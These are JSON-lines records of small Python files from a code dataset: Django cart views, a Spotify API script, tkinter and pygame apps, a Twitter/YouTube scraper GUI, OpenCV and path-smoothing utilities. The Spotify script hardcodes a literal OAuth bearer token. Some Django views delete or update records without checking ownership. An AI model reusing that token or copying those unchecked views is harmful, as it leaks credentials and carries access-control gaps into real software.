order.save()\n\n elif request.POST['menu_item'] == 'Sub':\n form = SubForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Sub'\n ingredients = form['ingredients']\n size = form['size']\n extras_list = []\n added_cost = Decimal(0.00)\n for extra in form['extras']:\n extras_list.append(str(extra))\n added_cost += extra.added_cost\n\n extras = \", \".join(extras_list)\n\n # Lookup price\n menu_sub = Sub.objects.get(ingredients=ingredients, size=size)\n price = menu_sub.price + Decimal(added_cost)\n\n # Create the Cart Item\n order = CartItem(menu=menu, size=size, style=ingredients, additional=extras, is_special=False, user_id=request.user.id, price=price)\n order.save()\n\n redirect('index')\n elif request.POST['menu_item'] == 'Pasta':\n form = PastaForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Pasta'\n style = form['style']\n\n # Lookup price\n menu_pasta = Pasta.objects.get(style=style)\n price = menu_pasta.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, user_id=request.user.id, price=price)\n order.save()\n elif request.POST['menu_item'] == 'Salad':\n form = SaladForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Salad'\n style = form['style']\n\n # Lookup price\n menu_salad = Salad.objects.get(style=style)\n price = menu_salad.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, user_id=request.user.id, price=price)\n order.save()\n elif request.POST['menu_item'] == 'DinnerPlatter':\n form = DinnerPlatterForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'DinnerPlatter'\n style = form['style']\n size = form['size']\n\n # Lookup price\n menu_dinner_platter = DinnerPlatter.objects.get(style=style, size=size)\n price = menu_dinner_platter.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, size=size, user_id=request.user.id, price=price)\n order.save()\n else:\n print(\"Post Error\")\n redirect('index')\n\n cart_items = get_cart_items(request)\n if cart_items:\n total_cost = Decimal(cart_items.aggregate(Sum('price'))['price__sum'])\n else:\n total_cost = 
0\n\n        context = {\n            'cart_items': cart_items,\n            'num_cart_items': cart_items.count(),\n            'total_cost': total_cost\n        }\n\n        return render(request, 'cart/cart.html', context)\n\n    else:\n\n        # Display Shopping Cart for GET request\n        cart_items = get_cart_items(request)\n        if cart_items:\n            total_cost = Decimal(cart_items.aggregate(Sum('price'))['price__sum'])\n        else:\n            total_cost = 0\n\n        context = {\n            'cart_items': cart_items,\n            'num_cart_items': cart_items.count(),\n            'total_cost': total_cost\n        }\n        return render(request, 'cart/cart.html', context)\n\n\ndef checkout(request):\n    if request.method == \"POST\":\n\n        cart_items = get_cart_items(request)\n\n        for item in cart_items:\n            menu = item.menu\n            size = item.size\n            style = item.style\n            additional = item.additional\n            is_special = item.is_special\n            price = item.price\n            user_id = item.user_id\n            order = OrderItem(menu=menu, size=size, style=style, additional=additional, is_special=is_special, price=price, user_id=user_id)\n            order.save()\n            item.delete()\n\n        all_order_items = OrderItem.objects.order_by('is_complete', 'created_at')\n\n        user_order_items = all_order_items.filter(user_id=request.user.id)\n        cart_items = get_cart_items(request)\n\n        context = {\n            'cart_items': cart_items,\n            'all_order_items': all_order_items,\n            'user_order_items': user_order_items,\n            'num_cart_items': cart_items.count(),\n        }\n\n        return render(request, 'cart/checkout.html', context)\n    else:\n        all_order_items = OrderItem.objects.order_by('is_complete', 'created_at')\n\n        user_order_items = all_order_items.filter(user_id=request.user.id)\n        cart_items = get_cart_items(request)\n\n        context = {\n            'cart_items': cart_items,\n            'all_order_items': all_order_items,\n            'user_order_items': user_order_items,\n            'num_cart_items': cart_items.count(),\n        }\n\n        return render(request, 'cart/checkout.html', context)\n\n\ndef remove(request, cart_item_id):\n    cart_item = CartItem.objects.filter(id=cart_item_id)\n    cart_item.delete()\n    return redirect('cart')\n\n\ndef mark_complete(request, order_item_id):\n    order_item = OrderItem.objects.filter(id=order_item_id)\n    order_item.update(is_complete=True)\n    return redirect('checkout')\n\n\n# Helper Functions\ndef get_cart_items(request):\n    cart_items = CartItem.objects.filter(user_id=request.user.id)\n    return cart_items\n","repo_name":"learyjk/pizza-cs50","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
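The None-guard around aggregate(Sum('price')) in the views above can also be folded into the query itself with Coalesce; a sketch of the same total as it might appear inside one of those views:

from django.db.models import DecimalField, Sum, Value
from django.db.models.functions import Coalesce

total_cost = CartItem.objects.filter(user_id=request.user.id).aggregate(
    total=Coalesce(Sum('price'), Value(0), output_field=DecimalField()),
)['total']  # Decimal('0') when the cart is empty, no if/else needed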
+{"seq_id":"50115573623","text":"#!/usr/bin/env python3\nimport requests\nimport json\n\nSEARCH_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/search?type=track'\nPLAYBACK_ENDPOINT = 'https://api.spotify.com/v1/me/player/queue'\n\ndef searchForTrack(query, token):  # returns a JSON string of the search response\n    searchParams = {'type': 'track'}\n    searchParams['q'] = query\n    searchParams['market'] = 'US'\n    searchParams['limit'] = 50\n    myheaders = {\"Accept\": \"application/json\"}\n    myheaders[\"Content-Type\"] = \"application/json\"\n    myheaders[\"Authorization\"] = \"Bearer \" + token\n    resp = requests.get(SEARCH_PLAYLIST_ENDPOINT, params=searchParams, headers=myheaders)\n    #writeToFile(json.dumps(resp.json()))\n    return json.dumps(resp.json())\n\ndef doTheThing(uri, token):\n    myheaders = {\"Accept\": \"application/json\"}\n    myheaders[\"Content-Type\"] = \"application/json\"\n    myheaders[\"Authorization\"] = \"Bearer \" + token\n    searchParams = {'uri': uri}\n    resp = requests.post(PLAYBACK_ENDPOINT, params=searchParams, headers=myheaders)\n    return resp\n\ndef testQueue(token):\n    # doTheThing needs a token as well as the track URI\n    doTheThing('spotify:track:3okk47CKOqAm1TXmVPzNYf', token)\n\ndef testSearch():\n    testQ = \"Something About Us Daft Punk\"\n    tok = 'BQArMtuw7RqCYEOG4ZIO2EnsQJV9_l8gpWl9CTWeQTB9ClYc5VDasCf7Kag_kODpCK3s1OoXXIePzJ15WjyVyPmKLlQtuy_vRHt2dpObg35AijY-N77yj71nuP7Y3eDTvLpAy20vA8zCzDMAOYR2LHF6EAOWygx_GBwpGMJRUD7N1zDM3wSXIpAGmP4'\n    response = searchForTrack(testQ, tok)\n    print(response)\n\ndef writeToFile(dict):\n    f = open('httpResponse.json', 'w')\n    f.write(dict)\n    f.close()","repo_name":"scaboodles/dj_hotkey","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"74346679294","text":"from tkinter import *\nfrom pojeto.banco.conexao import Conexao\nfrom pojeto.controler.cadastrarVC import CadastrarVC\nfrom functools import partial\n\n\nclass Vendas:\n    def abrirVendas(self):\n        janela = Tk()  # creates the main window\n        janela.resizable(0, 0)\n        quadro = Frame(janela, bd=2, relief=\"raised\", pady=10, padx=10)\n        quadro.place(x=20, y=20)  # positions the frame at x, y\n        fonte = ('Arial', '16', 'bold')  # defines the default font\n\n        def btnVendas():\n            cadastrar = CadastrarVC(edProduto.get(), edVender.get(), edInvisivel.get(), edFranquia.get())\n            cadastrado = cadastrar.CadastrarVenda()\n            return cadastrado\n\n        # FORM\n\n        lbProduto = Label(quadro, text=\"Product:\", font=fonte, pady=10, padx=10)\n        lbVender = Label(quadro, text=\"Sell:\", font=fonte, pady=10, padx=10)\n        lbFranquia = Label(quadro, text=\"Franchise:\", font=fonte, pady=10, padx=10)\n        edProduto = Entry(quadro, font=fonte, width=25)\n        edInvisivel = Entry(quadro, font=fonte, width=25)\n        edInvisivel.insert(0, '7')  # Entry has no 'text' option; preload the value instead\n        edVender = Entry(quadro, font=fonte, width=25)\n        edFranquia = Entry(quadro, font=fonte, width=25)\n\n        btVenda = Button(quadro, font=fonte, text=\"Sell\", fg=\"green\",\n                         activebackground=\"#A9A9A9\", activeforeground=\"white\")\n        btVenda['command'] = partial(btnVendas)\n\n        # DISPLAYING THE ITEMS\n\n        lbProduto.grid(row=0, column=0)\n        edProduto.grid(row=0, column=1)\n        lbVender.grid(row=2, column=0)\n        edVender.grid(row=2, column=1)\n        lbFranquia.grid(row=3, column=0)\n        edFranquia.grid(row=3, column=1)\n\n        btVenda.grid(row=5, column=1)\n\n        #photoLupa = PhotoImage(file=\"img/lupa2.png\")\n        #logoLupa = photoLupa.subsample(15, 15)\n        btBusca = Button(quadro, bd=1)  #image=logoLupa\n        btBusca.grid(row=0, column=3)\n\n        # creating the message label\n        lbMensagem = Label(janela, text=\"\", font=fonte)\n        lbMensagem.place(x=20, y=280)\n\n        janela.geometry(\"640x320+200+200\")  # Width x Height + left offset + top offset\n        janela.title(\"Search, Registration and Update\")  # sets the window title\n        #janela.iconbitmap(\"img/icone.ico\")\n        janela.mainloop()  # shows the window\n","repo_name":"LuanKennedy/Python","sub_path":"pojeto/view/venda.py","file_name":"venda.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"29465815620","text":"import pygame\nfrom tank import Tank\n\nclass Player(Tank):\n\tdef __init__(self, game, level, position=None, direction=None, filename=None):\n\t\tsuper().__init__(game, level, side=0, position=None, direction=None, filename=None)\n\t\tself.start_position = position\n\t\tself.start_direction = direction\n\t\tself.lives = 3\n\t\tself.score = 0 # total score\n\n\t\t# scoreboard: how many bonuses this player has collected in this stage\n\t\tself.trophies = {\n\t\t\t\"bonus\" : 0,\n\t\t\t\"enemy0\" : 0,\n\t\t\t\"enemy1\" : 0,\n\t\t\t\"enemy2\" : 0,\n\t\t\t\"enemy3\" : 0\n\t\t}\n\t\t\n\t\tif filename is None:\n\t\t\tfilename = (0, 0, 16*2, 16*2)\n\t\tself.image = self.game.sprites.subsurface(filename)\n\t\tself.image_up = self.image\n\t\tself.image_left = pygame.transform.rotate(self.image, 90)\n\t\tself.image_down = pygame.transform.rotate(self.image, 180)\n\t\tself.image_right = pygame.transform.rotate(self.image, 270)\n\n\t\tif direction is None:\n\t\t\tself.rotate(self.DIR_UP, False)\n\t\telse:\n\t\t\tself.rotate(direction, False)\n\n\tdef move(self, direction):\n\t\t\"\"\" move player if possible \"\"\"\n\t\tif self.state == self.STATE_EXPLODING:\n\t\t\tif not self.explosion.active:\n\t\t\t\tself.state = self.STATE_DEAD\n\t\t\t\tdel self.explosion\n\n\t\tif self.state != self.STATE_ALIVE:\n\t\t\treturn\n\n\t\tif self.direction != direction: # rotate player\n\t\t\tself.rotate(direction)\n\n\t\tif self.paralised: # paralysed: cannot move\n\t\t\treturn\n\n\t\t# speed: px per move, default = 2\n\t\tif direction == self.DIR_UP: # move player\n\t\t\tnew_position = [self.rect.left, self.rect.top - self.speed]\n\t\t\tif new_position[1] < 0:\n\t\t\t\treturn\n\t\telif direction == self.DIR_RIGHT:\n\t\t\tnew_position = [self.rect.left + self.speed, self.rect.top]\n\t\t\tif new_position[0] > (416 - 26):\n\t\t\t\treturn\n\t\telif direction == self.DIR_DOWN:\n\t\t\tnew_position = [self.rect.left, self.rect.top + self.speed]\n\t\t\tif new_position[1] > (416 - 26):\n\t\t\t\treturn\n\t\telif direction == self.DIR_LEFT:\n\t\t\tnew_position = [self.rect.left - self.speed, self.rect.top]\n\t\t\tif new_position[0] < 0:\n\t\t\t\treturn\n\n\t\tplayer_rect = pygame.Rect(new_position, [26, 26])\n\n\t\t# collisions with tiles\n\t\tif player_rect.collidelist(self.level.obstacle_rects) != -1:\n\t\t\treturn # ignore update\n\n\t\t# collisions with other players\n\t\tfor player in self.game.players:\n\t\t\tif player != self and player.state == player.STATE_ALIVE and player_rect.colliderect(player.rect):\n\t\t\t\treturn # ignore update\n\n\t\t# collisions with enemies\n\t\tfor enemy in self.game.enemies:\n\t\t\tif player_rect.colliderect(enemy.rect):\n\t\t\t\treturn # ignore update\n\n\t\t# collisions with bonuses\n\t\tfor bonus in self.game.bonuses:\n\t\t\tif player_rect.colliderect(bonus.rect):\n\t\t\t\tself.bonus = bonus\n\n\t\t# if no collision, move player\n\t\tself.rect.topleft = (new_position[0], new_position[1])\n\n\tdef reset(self):\n\t\t\"\"\" reset player \"\"\"\n\t\tself.rotate(self.start_direction, False)\n\t\tself.rect.topleft = self.start_position\n\t\tself.superpowers = 0\n\t\tself.max_active_bullets = 1\n\t\tself.health = 100\n\t\tself.paralised = False\n\t\tself.paused = False\n\t\tself.pressed = [False] * 4\n\t\tself.state = self.STATE_ALIVE","repo_name":"Movelocity/battle-city","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
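The movement code above leans on pygame.Rect collision helpers; a standalone sketch of collidelist, which returns the index of the first overlapping rect or -1:

import pygame

obstacles = [pygame.Rect(0, 0, 26, 26), pygame.Rect(100, 100, 26, 26)]
player = pygame.Rect(90, 90, 26, 26)
print(player.collidelist(obstacles))  # 1 (overlaps the second rect); -1 means no hit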
+{"seq_id":"279148752","text":"import customtkinter as ctk\nfrom .settings import *\nfrom PIL import Image\nimport os\nfrom .components import TitleLabel, SmallLabelButton\nfrom typing import Callable\n\n\ndef change_theme():\n \"\"\"\n This function changes the theme of the app, is called by the button on the title bar\n \"\"\"\n\n if ctk.get_appearance_mode() == \"Dark\":\n ctk.set_appearance_mode(\"light\")\n else:\n ctk.set_appearance_mode(\"dark\")\n\n\nclass TitleBar(ctk.CTkFrame):\n \"\"\"\n The title bar that is present in every frame, the text in the title can be changed by a given method\n \"\"\"\n def __init__(self, master,\n title_text,\n refresh_command=None,\n back_command: Callable[..., None] | None = None):\n super().__init__(master,\n fg_color=\"transparent\")\n\n self.back_command = back_command\n\n # The label containing the text that explains what the current scene is showing\n self.title_label = TitleLabel(self,\n title_text)\n\n self.title_label.grid(row=0, column=0, sticky=\"nw\", pady=(DEFAULT_PAD, 0), padx=DEFAULT_PAD)\n\n if self.back_command is not None:\n self.back_button = SmallLabelButton(self,\n text=\"Back\",\n width=0,\n height=0,\n border_spacing=0,\n command=self.back_command)\n self.back_button.grid(row=1, column=0, sticky=\"w\", padx=DEFAULT_PAD)\n self.title_label.grid_configure(pady=(0, 0))\n\n # The image within the theme change button\n self.theme_image = ctk.CTkImage(\n light_image=Image.open(os.path.join(os.getcwd(), \"images/dark-theme.png\")),\n dark_image=Image.open(os.path.join(os.getcwd(), \"images/light-theme.png\")),\n size=(30, 30)\n )\n\n # The button that changes the theme when clicked\n self.theme_button = ctk.CTkButton(\n self,\n fg_color=\"transparent\",\n image=self.theme_image,\n command=change_theme,\n text=\"\",\n width=45,\n height=45,\n hover_color=BUTTON_HOVER_COLOR,\n corner_radius=8\n )\n self.theme_button.grid(row=0, rowspan=2, column=2, sticky=\"e\", pady=DEFAULT_PAD, padx=(0, DEFAULT_PAD))\n\n self.command = refresh_command\n\n if self.command is not None:\n self.refresh_image = ctk.CTkImage(\n light_image=Image.open(os.path.join(os.getcwd(), \"images/light-refresh.png\")),\n dark_image=Image.open(os.path.join(os.getcwd(), \"images/dark-refresh.png\")),\n size=(30, 30)\n )\n\n self.refresh_button = ctk.CTkButton(\n self,\n fg_color=\"transparent\",\n image=self.refresh_image,\n command=self.command,\n text=\"\",\n width=45,\n height=45,\n hover_color=BUTTON_HOVER_COLOR,\n corner_radius=8\n )\n\n self.refresh_button.grid(row=0, rowspan=2, column=1, sticky=\"e\", **DEFAULT_PAD_COMPLETE)\n\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=0)\n self.columnconfigure(0, weight=1)\n self.columnconfigure([1, 2], weight=0)\n","repo_name":"bilboderbyshire/school-report-writer","sub_path":"scripts/title_bar.py","file_name":"title_bar.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41222589494","text":"import os\nimport unittest\n\nfrom numpy.testing import assert_array_equal\n\nfrom tests.base import FIXTURES_DIR, SWORD_PNG_PATH\n\nfrom pixels2svg.utils import pixel\n\nIMAGE_FORMATS_DIR = os.path.join(FIXTURES_DIR, 'formats')\n\n\nclass TestUtilsPixel(unittest.TestCase):\n\n def test_id_to_from_rgba(self):\n\n self.assertEqual(\n (184, 0, 255, 54),\n pixel.id_to_rgba(pixel.rgba_to_id((184, 0, 255, 54)))\n )\n\n def test_id_to_from_rgba_array(self):\n\n img = pixel.read_image(SWORD_PNG_PATH)\n\n assert_array_equal(\n img,\n pixel.id_array_to_rgba_array(pixel.rgba_array_to_id_array(img))\n )\n\n def test_read_image(self):\n image_arrays = []\n for filename in os.listdir(IMAGE_FORMATS_DIR):\n image_path = os.path.join(IMAGE_FORMATS_DIR, filename)\n image_arrays.append(pixel.read_image(image_path))\n array_base = image_arrays[0]\n for array_comp in image_arrays[1:]:\n assert_array_equal(array_base, array_comp)\n","repo_name":"ValentinFrancois/pixels2svg","sub_path":"tests/test_utils_pixel.py","file_name":"test_utils_pixel.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"}
+{"seq_id":"12293428351","text":"import os\nimport logging\nimport config\nimport googleapiclient.discovery\nimport googleapiclient.errors\nimport tweepy\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport pandas as pd\nimport dfgui\nimport csv\nfrom tkinter import *\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter.messagebox import showinfo\nfrom functools import partial\n\n \ndef twitter(search):\n global errorlabel\n if errorlabel:\n errorlabel.destroy()\n search = search.get()\n with open('searchlog.txt', 'a+') as f:\n f.write(search)\n f.write('\\n')\n f.close()\n #api keys provided by twitter\n consumer_key = config.consumer_key\n consumer_secret = config.consumer_secret\n access_key= config.access_key\n access_secret = config.access_secret\n tweet_num = 8\n tweets = []\n data = []\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_key, access_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True)\n #getting results from search \n results = tweepy.Cursor(api.search_tweets,q=search+ \" -filter:retweets\",\n lang=\"en\").items(tweet_num)\n #filling up data into lists\n for status in results:\n if status.lang == 'en':\n data = {'User': status.user.name,\n 'Account name': '@'+status.user.screen_name, \n 'Tweet': status.text, \n 'Time': status.created_at,\n 'Nr of retweets': status.retweet_count,\n 'Nr of favorited': status.favorite_count}\n tweets.append(data)\n if len(data):\n #coverting that data into a csv and gui\n twitinfo = pd.DataFrame(tweets) \n twitinfo.head()\n twitinfo.to_csv('twitter.csv', mode='a+',encoding='utf-8')\n print (twitinfo)\n dfgui.show(twitinfo)\n \n else:\n errorlabel = Label(tk, text=\"No data available for search, please retry\", bg='#ffffff')\n errorlabel.place(x=65, y=300)\n with open('errorlogs.txt', 'a+') as f:\n f.write(\"No data available for \")\n f.write(search)\n f.write('\\n')\n f.close()\ndef youtube(search):\n global errorlabel\n if errorlabel:\n errorlabel.destroy()\n search = search.get()\n with open('searchlog.txt', 'a+') as f:\n f.write(search)\n f.write('\\n')\n f.close()\n rows = []\n videoID = []\n SCOPES = 'https://www.googleapis.com/auth/youtube.force-ssl'\n api_service_name = \"youtube\"\n api_version = \"v3\"\n API_KEY = config.API_KEY\n youtube = googleapiclient.discovery.build(\n api_service_name, api_version, developerKey = API_KEY)\n #searching for video\n request = youtube.search().list(\n part=\"id,snippet\",\n type='video',\n q=search,\n videoDuration='any',\n videoDefinition='any',\n maxResults=1,\n fields=\"nextPageToken,items(id(videoId),snippet(publishedAt,channelId,channelTitle,title,description))\"\n )\n response = request.execute()\n #for each video found looks through comments\n for items in response['items']:\n videoID.append(items['id']['videoId'])\n try:\n for item in videoID:\n video_response=youtube.commentThreads().list(\n part='id,snippet,replies',\n videoId=item,\n maxResults=8\n ).execute()\n #grabs the comments and places them in list\n for item in video_response['items']:\n comment = str(item['snippet']['topLevelComment']['snippet']['textDisplay'])\n rows.append([\n items['snippet']['channelTitle'],\n items['snippet']['title'],\n items['snippet']['description'],comment])\n except:\n with open('errorlogs.txt', 'a+') as f:\n f.write(search)\n f.write(\" ,video has comments disabled\")\n f.write('\\n')\n f.close()\n print(search,\" video has comments disabled\")\n \n if len(rows):\n #coverts into an csv and gui\n 
ytinfo = pd.DataFrame(rows, columns = [\"Channel Name\", \"Title\", \"Description\", \"Comment\" ])\n ytinfo.to_csv('youtube.csv',mode='a+', encoding='utf-8')\n print(ytinfo)\n dfgui.show(ytinfo)\n else:\n errorlabel = Label(tk, text=\"No data available for search, please retry\", bg='#ffffff')\n errorlabel.place(x=65, y=300)\n with open('errorlogs.txt', 'a+') as f:\n f.write(\"No data available for \")\n f.write(search)\n f.write('\\n')\n f.close()\ndef csv():\n filetypes = (\n ('csv files', '*.csv'),\n ('All files', '*.csv*')\n )\n\n filename = fd.askopenfilename(\n title='Open a file',\n initialdir='/',\n filetypes=filetypes)\n if filename:\n openedCSV = pd.read_csv(filename)\n if (\"twitter.csv\" in str(filename)):\n new = openedCSV[~openedCSV['Nr of retweets'].isin(['Nr of retweets'])]\n dfgui.show(new)\n elif(\"youtube.csv\" in str(filename)):\n new = openedCSV[~openedCSV['Channel Name'].isin(['Channel Name'])]\n dfgui.show(new)\n else:\n dfgui.show(openedCSV)\ndef viewHistory():\n tk = Tk()\n tk.geometry(\"600x500\")\n tk.title(\"History file\")\n txtarea = Text(tk, width=600, height=500, bg='#f1f3f7')\n txtarea.place(x=0, y=0)\n try:\n tf = open(\"searchlog.txt\", \"r\")\n txtarea.insert(END, tf.read())\n tf.close()\n except:\n print(\"searchlog file doesn't exist yet\")\ndef clearHistory():\n with open(\"searchlog.txt\", \"w\") as tf:\n tf.write(\"\")\n tf.close()\ndef on_click(event):\n if searchEntry.cget('fg') == 'grey':\n searchEntry.delete(0, \"end\")\n searchEntry.insert(0, '')\n\n \n#building gui\ntk = Tk()\ntk.geometry(\"720x405\")\ntk.title(\"BuzzHunt\")\ntk['bg']='#ffffff'\n\ntry:\n photo = PhotoImage(file = \"images/buzz.png\")\n logo1 = PhotoImage(file = \"images/logo1.png\")\n logo2 = PhotoImage(file = \"images/logo2.png\")\n chooseOne = PhotoImage(file = \"images/chooseOne.png\")\n ytButton = PhotoImage(file = \"images/ytbutton.png\")\n twButton = PhotoImage(file = \"images/twbutton.png\")\n csvButton = PhotoImage(file = \"images/csvbutton.png\")\n cHistory = PhotoImage(file = \"images/clearHistory.png\")\n vHistory = PhotoImage(file = \"images/viewHistory.png\")\nexcept:\n print(\"Images not found\")\ntk.iconphoto(False, photo)\n\nlabel1 = Label(image = logo1, bg='#ffffff').place(x=300, y=0) \nlabel2 = Label(image = logo2, bg='#ffffff').place(x=0, y=0)\nlabel3 = Label(image = chooseOne, bg='#ffffff').place(x=65, y=210)\nsearch = StringVar()\nerrorlabel = None\nsearchEntry = Entry(tk, textvariable=search, bg='#f9f9f9', width = 25)\nsearchEntry.place(x=66, y=180)\nsearchEntry.insert(0, 'Search..')\nsearchEntry.bind('', on_click)\nsearchEntry.config(fg = 'grey')\n\n\nyoutube = partial(youtube, search)\ntwitter = partial(twitter, search)\nb1 = Button(tk, text=\"On Twitter\", command=twitter, bg='#00acee', image=twButton,highlightthickness = 0, bd = 0).place(x=160, y=240)\nb2 = Button(tk, text=\"On YouTube\", command=youtube, bg='#c4302b', image=ytButton,highlightthickness = 0, bd = 0).place(x=65, y=240)\nb3 = Button(tk, text=\"Open CSV File\", command=csv, bg='#7289DA', image=csvButton,highlightthickness = 0, bd = 0).place(x=255, y=240)\nb4 = Button(tk, text=\"View History\", command=viewHistory, bg='#ffffff',image=vHistory, highlightthickness=0, bd=0).place(x=65, y=360)\nb5 = Button(tk, text=\"Clear History\", command=clearHistory, bg='#ffffff', image=cHistory, highlightthickness=0, bd=0).place(x=171, y=360)\ntk.mainloop() 
\n","repo_name":"Saad-iit/OISNT_Project","sub_path":"FinalOistproject.py","file_name":"FinalOistproject.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"28893135899","text":"import cv2\nimport argparse\nimport numpy as np\n\ndef adjacent_video(videoPath1, videoPath2, outputPath):\n \"\"\"\n Name: adjacent_video\n Input: path to left video, path to right video, path to output\n Return: none\n What it does: puts left and right video sidebyside\n \"\"\"\n # read existing video in folder\n cap = cv2.VideoCapture(videoPath1)\n cap2 = cv2.VideoCapture(videoPath2)\n\n # output file\n fourcc = 0x00000021\n out = cv2.VideoWriter(outputPath, fourcc, 20.0, (1280,480))\n\n while(True):\n ret, frame = cap.read()\n ret2, frame2 = cap2.read()\n if not ret and not ret2:\n break;\n if ret:\n lframe = frame\n if ret:\n lframe2 = frame2\n #merge images side by side \n combined_frame = np.concatenate([lframe, lframe2], axis = 1)\n out.write(combined_frame)\n\n cap.release()\n cap2.release()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"inputPath\", help = \"path to video with *'XVID' codec\")\n parser.add_argument(\"inputPath2\", help = \"path to video with *'XVID' codec\")\n parser.add_argument(\"outputPath\", help = \"path to output video with faces and eyes detected\")\n args = parser.parse_args()\n adjacent_video(args.inputPath, args.inputPath2, args.outputPath)\n","repo_name":"tuftsceeo/EDL2020","sub_path":"student_notebook_root_folder/archive/image_processing/python_scripts/adjacent_video.py","file_name":"adjacent_video.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43056671752","text":"import math\n\n# Calculate the perpendicular distance from a point to a line segment\ndef point_to_line_distance(point, start, end):\n line_length = math.dist(start, end)\n if line_length == 0:\n return math.dist(point, start)\n \n t = ((point[0] - start[0]) * (end[0] - start[0]) + (point[1] - start[1]) * (end[1] - start[1])) / (line_length ** 2)\n t = max(0, min(1, t))\n \n projection = (start[0] + t * (end[0] - start[0]), start[1] + t * (end[1] - start[1]))\n return math.dist(point, projection)\n\n# Recursive Douglas-Peucker simplification\ndef douglas_peucker_simplify(path, epsilon):\n dmax = 0\n index = 0\n \n for i in range(1, len(path) - 1):\n d = point_to_line_distance(path[i], path[0], path[-1])\n if d > dmax:\n index = i\n dmax = d\n \n if dmax > epsilon:\n recursive_result1 = douglas_peucker_simplify(path[:index + 1], epsilon)\n recursive_result2 = douglas_peucker_simplify(path[index:], epsilon)\n simplified_path = recursive_result1[:-1] + recursive_result2\n else:\n simplified_path = [path[0], path[-1]]\n \n return simplified_path\n\n\ndef smooth_path(path):\n \n if len(path) <= 2:\n return path # path already smoothed\n\n smoothed_path = path\n # current_dir = [path[1][0] - path[0][0], path[1][1] - path[0][1]]\n # smoothed_path = [path[0]]\n # for i in range(2, len(path)):\n # if [path[i][0] - path[i-1][0], path[i][1] - path[i-1][1]] != current_dir:\n # smoothed_path.append(path[i-1])\n # current_dir = [path[i][0] - path[i-1][0], path[i][1] - path[i-1][1]]\n # smoothed_path.append(path[-1])\n\n\n smoothed_path = douglas_peucker_simplify(smoothed_path, epsilon=1)\n\n return smoothed_path\n","repo_name":"jjah0001/ECE4191G11","sub_path":"SCR/path_planning_search_based/path_smoothing.py","file_name":"path_smoothing.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"40739193803","text":"\"\"\"\nDjango settings for project.\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os.path\n\n# Debug\n#DEBUG = False\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = (\n ('', ''),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = ''\nALLOWED_HOSTS = []\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = False\nUSE_TZ = False\nDEFAULT_CHARSET = 'utf-8'\nFILE_CHARSET = 'utf-8'\n\nSERVER_URL = \"\"\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nROOT_DIR = os.path.dirname(__file__)\nROOT_URL = \"/djskeletor/\"\nROOT_URLCONF = 'djskeletor.urls'\nWSGI_APPLICATION = 'djskeletor.wsgi.application'\nMEDIA_ROOT = ''\nADMIN_MEDIA_PREFIX = '/static/admin/'\nSTATIC_ROOT = ''\nSTATIC_URL = \"/static/\"\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nDATABASES = {\n 'default': {\n 'HOST': '127.0.0.1',\n 'PORT': '3306',\n 'NAME': 'djskeletor',\n 'ENGINE': 'django.db.backends.mysql',\n 'USER': '',\n 'PASSWORD': ''\n },\n}\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'djskeletor',\n 'djskeletor.core',\n 'djskeletor.myapp',\n 'djtools',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n# template stuff\nTEMPLATES = [\n {\n 'BACKEND': 